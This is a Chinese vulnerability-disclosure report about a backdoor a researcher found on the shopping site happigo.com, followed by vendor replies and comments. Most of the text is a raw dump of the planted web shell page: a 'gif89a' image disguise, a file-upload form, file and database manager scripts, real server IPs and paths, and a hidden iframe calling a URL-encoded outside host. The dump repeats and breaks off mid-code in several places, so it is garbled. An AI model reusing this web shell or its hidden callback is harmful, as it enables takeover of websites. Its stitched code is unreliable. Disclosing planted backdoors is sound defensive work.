2012-08-06: 细节已通知厂商,等待厂商处理中
2012-08-11: 厂商已主动忽略该漏洞,细节向公众公开
昨天晚上本来打算找漏洞,结果意外抓到了一个后门。可怜的娃。我只能说 google hacking 真强大。
http://posgoo.happigo.com/admin/system/codeigniter/cts.php
gif89a<html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><style type="text/css">body,td{font-family:tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px;}strong{font-size:12px;}a:link{color:#0066CC;}a:hover{color:#FF6600;}a:visited{color:#003366;}a:active{color:#9DCC00;}a{TEXT-DECORATION:none}table.itable{}td.irows{height:20px;background:url("index.php?i=dots") repeat-x bottom}</style></head><script type="text/javascript">function oCopy(obj){obj.select();js=obj.createTextRange();js.execCommand("Copy");};function sendtof(url){window.clipboardData.setData('Text',url);alert('复制地址成功,粘贴给你好友一起分享。');};function select_format(){var on=document.getElementById('fmt').checked;document.getElementById('site').style.display=on?'none':'';document.getElementById('sited').style.display=!on?'none':'';};var flag=false;function DrawImage(ImgD){var image=new Image();image.src=ImgD.src;if(image.width>0&&image.height>0){flag=true;if(image.width/image.height>=120/80){if(image.width>120){ImgD.width=120;ImgD.height=(image.height*120)/image.width;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}else {if(image.height>80){ImgD.height=80;ImgD.width=(image.width*80)/image.height;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}};};function FileChange(Value){flag=false;document.all.uploadimage.width=10;document.all.uploadimage.height=10;document.all.uploadimage.alt="";document.all.uploadimage.src=Value;};</script><body><center><form enctype="multipart/form-data" method="post" name="upform"><input style="width:208;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17" name=upfile type=file onchange="javascript:FileChange(this.value);"><br><input type="submit" value="" style="width:60;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17"><br> <br> 
<p><br> </p></form></center><script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql 
Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body><span style="display:none"><iframe src=http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D/admin/jpg.asp width=0 height=0></iframe></body></html></html></body><iframe src= width=0 height=0></iframe></html></body></html><script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = 
Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入要新建的Mdb文件全名称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("E%69%70%67%6F%76%2E%63");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT 
NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html></html></body><iframe src= eateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DNaeateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!eateMdb"){DName = prompt("请名称,eateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DNa",FName);top.hideform.FName.value = DNawidth=0 height=0></iframe></html></body></html><script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += 
"||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("E%69%70%67%6F%76%2E%63",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'usernafunction yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function 
ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY 
(1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html></html></body><iframe src= width=0 height=0></iframe></html></body></ht吗?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName 
= prompt("请输入要新建的Mdb文件全名称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return 
true;}</script></body></html></body></html><html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312"><style type="text/css">body,td{font-family:tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px;}strong{font-size:12px;}a:link{color:#0066CC;}a:hover{color:#FF6600;}a:visited{color:#003366;}a:active{color:#9DCC00;}a{TEXT-DECORATION:none}table.itable{}td.irows{height:20px;background:url("index.php?i=dots") repeat-x bottom}</style></head><script type="text/javascript">function oCopy(obj){obj.select();js=obj.createTextRange();js.execCommand("Copy");};function sendtof(url){window.clipboardData.setData('Text',url);alert('复制地址成功,粘贴给你好友一起分享。');};function select_format(){var on=document.getElementById('fmt').checked;document.getElementById('site').style.display=on?'none':'';document.getElementById('sited').style.display=!on?'none':'';};var flag=false;function DrawImage(ImgD){var image=new Image();image.src=ImgD.src;if(image.width>0&&image.height>0){flag=true;if(image.width/image.height>=120/80){if(image.width>120){ImgD.width=120;ImgD.height=(image.height*120)/image.width;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}else {if(image.height>80){ImgD.height=80;ImgD.width=(image.width*80)/image.height;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}};};function FileChange(Value){flag=false;document.all.uploadimage.width=10;document.all.uploadimage.height=10;document.all.uploadimage.alt="";document.all.uploadimage.src=Value;};</script><body><center><form enctype="multipart/form-data" method="post" name="upform"><input style="width:208;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17" name=upfile type=file onchange="javascript:FileChange(this.value);"><br><input type="submit" value="" style="width:60;border:1 solid #9a9999; font-size:9pt; 
background-color:#ffffff; height:18" size="17"><br> <br> <p><br> </p></form>
很明显的一个上传。
清除后门,并检查其他网站是否也被植入了后门。仅删除文件并不能堵住入口:还应排查后门是经由哪条路径写入的(页面本身就带有一个文件上传表单),并核查页面中隐藏 iframe 所指向的外部地址,否则后门很可能被重新写入。
危害等级:无影响(厂商忽略)
忽略时间:2012-08-11 13:09
2012-08-17:已修复
@快乐购物股份有限公司 其他公司的都收过了,据说快乐购礼品很丰富啊,
二哥,你确定这个后门能用?当初的struts搞的吧!
@风萧萧 应该可以吧。有上传,还有后门,gif89a 你懂的。
很黄很暴力。http://www.happigo.com/momo.txt
怎么我忽悠的没人信呢? http://www.happigo.com/
@zeracker 不是我以前传的吧?没解析成功啊...
既然删除后忽略了,压力。
@快乐购物股份有限公司 有脾气就别删除,修复再忽略。必遭万人唾骂!
哇 什么情况呀~各位大牛 本人忙碌了一年 上周修了个年假 好像发生了一些沟通上的小问题~ 别急 我会补偿你们的~@zeracker 不要冲动 冲动是魔鬼~~ @momo 不存在删除后忽略 是系统自动的~ 各位 我回来了 你们懂的!!
@快乐购物股份有限公司 你搞个年休假,出了很多事!
。。。系统自动忽略哦,就说么,直接忽略后修复。。。这么霸气的举动必然会被乌云拉黑的。。
是新进员工操作失误导致的,不是故障修复后忽略的,在此对提交此漏洞的白帽子表示抱歉!